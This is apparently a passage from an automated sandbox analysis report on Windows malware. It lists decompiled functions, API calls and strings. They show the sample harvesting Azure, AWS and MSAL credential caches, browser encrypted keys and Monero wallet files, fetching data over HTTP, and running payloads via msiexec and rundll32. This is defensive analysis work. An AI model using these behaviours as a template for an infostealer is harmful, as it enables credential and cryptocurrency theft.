                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 120ba5d3f9a8d588670c262437df43999f77a017c989a3f2d1d134199310405e
                                    • Instruction ID: c23e98dd32a0bfed1980315be111de9931213fa7f692b6c758d7485178a40c47
                                    • Opcode Fuzzy Hash: 120ba5d3f9a8d588670c262437df43999f77a017c989a3f2d1d134199310405e
                                    • Instruction Fuzzy Hash: D0E1FD71A10118ABDF14EBA4EC96FEFB778BF15304F404159F10667192EF306A4ADBA2
                                    Function 00098320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,00D3C110,00000000,00020019,00000000,000A05B6), ref: 000983A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                    • wsprintfA.USER32 ref: 00098459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                    • Instruction ID: b30e5b9cca1dc3f8279136f65e1e3d3c2f3298e61c6bf0c68195291e9900eca7
                                    • Opcode Fuzzy Hash: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                    • Instruction Fuzzy Hash: 4F81097191012CABDF24DB60DD95FEAB7B8BF09704F008299E109A6181DF716B89DFE1
                                    Function 00094D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00094DCD
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                      • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00094E59
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                      • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                      • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00094EE5
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949B0
                                      • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A08D2), ref: 000949C5
                                      • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949E2
                                      • Part of subcall function 00094910: PathMatchSpecA.SHLWAPI(?,?), ref: 00094A1E
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,00D3FCD0), ref: 00094A4A
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FF8), ref: 00094A5C
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A70
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FFC), ref: 00094A82
                                      • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A96
                                      • Part of subcall function 00094910: CopyFileA.KERNEL32(?,?,00000001), ref: 00094AAC
                                      • Part of subcall function 00094910: DeleteFileA.KERNEL32(?), ref: 00094B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 107cc596a99a07c2cabcfb02c403420a28ee9553383c78a3f967beb6efbe45f8
                                    • Instruction ID: f40f2e0158b519502fbf9ed553f4b8ad4ab122ca53f34f8e14125e872da9757a
                                    • Opcode Fuzzy Hash: 107cc596a99a07c2cabcfb02c403420a28ee9553383c78a3f967beb6efbe45f8
                                    • Instruction Fuzzy Hash: 5341857AA4020867DB10F7B0EC47FED7738AB65704F404594B685AA0C2EEF457C99B92
                                    Function 00099010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0009906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                    • Instruction ID: 19490ac2f9758468b87c934930cb18bf1ff2a3f4f9da5ac8137e6cb047c38a60
                                    • Opcode Fuzzy Hash: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                    • Instruction Fuzzy Hash: A671CA75A10208EBDF14EBE4EC89FEEB7B9BF48704F108508F515A7290DB35A905DB61
                                    Function 00092E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000931C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0009335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000934EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                    • Instruction ID: 5fc5229e17d6dad0c005e502d56c18b656ceee13835ee0d58fcdb392329c72e9
                                    • Opcode Fuzzy Hash: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                    • Instruction Fuzzy Hash: 32121C71910118AADF19FBA0DC92FEEB778AF15300F504169F50666192EF342B4EDFA2
                                    Function 000952C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                      • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086303
                                      • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                      • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
                                      • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                      • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                    • lstrlen.KERNEL32(00000000), ref: 0009532F
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                    • lstrlen.KERNEL32(00000000), ref: 00095383
                                    • lstrlen.KERNEL32(00000000), ref: 000953AE
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 554c2ab06e42fb293e1a29862ded371aca5edd4b1cd5d9ba9cf76d1dfdccee32
                                    • Instruction ID: 610813d34ac9537742f87b4260118639fea1cd7cf1aed987197ee175879418bd
                                    • Opcode Fuzzy Hash: 554c2ab06e42fb293e1a29862ded371aca5edd4b1cd5d9ba9cf76d1dfdccee32
                                    • Instruction Fuzzy Hash: D751DC70A20148DBCF14FF60DD96EEE7779AF11341F504018E50A5A593EF346B4AEBA2
                                    Function 000912D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: a90b7bdf6f52c1ea13ee53478a68ff69b20c8901b4035067f34c894490657832
                                    • Instruction ID: ab1d852f20dd8c9ae7a8ccfb4d70efef9e9e1d1a1bec710d525c791220ed00e7
                                    • Opcode Fuzzy Hash: a90b7bdf6f52c1ea13ee53478a68ff69b20c8901b4035067f34c894490657832
                                    • Instruction Fuzzy Hash: 58C184B5A0021D9BCF14EF60DC8AFEE7378BB54304F004599F50AA7292DB70AA85DF91
                                    Function 00094280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000942EC
                                    • lstrcat.KERNEL32(?,00D3F398), ref: 0009430B
                                    • lstrcat.KERNEL32(?,?), ref: 0009431F
                                    • lstrcat.KERNEL32(?,00D3DE68), ref: 00094333
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                      • Part of subcall function 00089CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 000993C0: GlobalAlloc.KERNEL32(00000000,000943DD,000943DD), ref: 000993D3
                                    • StrStrA.SHLWAPI(?,00D3F3C8), ref: 000943F3
                                    • GlobalFree.KERNEL32(?), ref: 00094512
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                      • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                      • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                      • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000944A3
                                    • StrCmpCA.SHLWAPI(?,000A08D1), ref: 000944C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000944D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 000944E5
                                    • lstrcat.KERNEL32(00000000,000A0FB8), ref: 000944F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: cab55b5536a0d7f9ed69691990de0d4bcd95c7cf2e8382fb010c43379c6175bc
                                    • Instruction ID: dc93a4335fefa933d7b5ecf1e554d31a75fd498acc80cbf374735a1af49a4bd5
                                    • Opcode Fuzzy Hash: cab55b5536a0d7f9ed69691990de0d4bcd95c7cf2e8382fb010c43379c6175bc
                                    • Instruction Fuzzy Hash: B4711676900208ABDF14FBE0EC8AFEE77B9BB49304F048598F60597182DA35DB45DB91
                                    Function 00081310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                      • Part of subcall function 000812A0: RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                      • Part of subcall function 000812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                      • Part of subcall function 000812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                      • Part of subcall function 000812A0: RegCloseKey.ADVAPI32(?), ref: 000812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008134F
                                    • lstrlen.KERNEL32(?), ref: 0008135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00081377
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00081465
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 000814EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
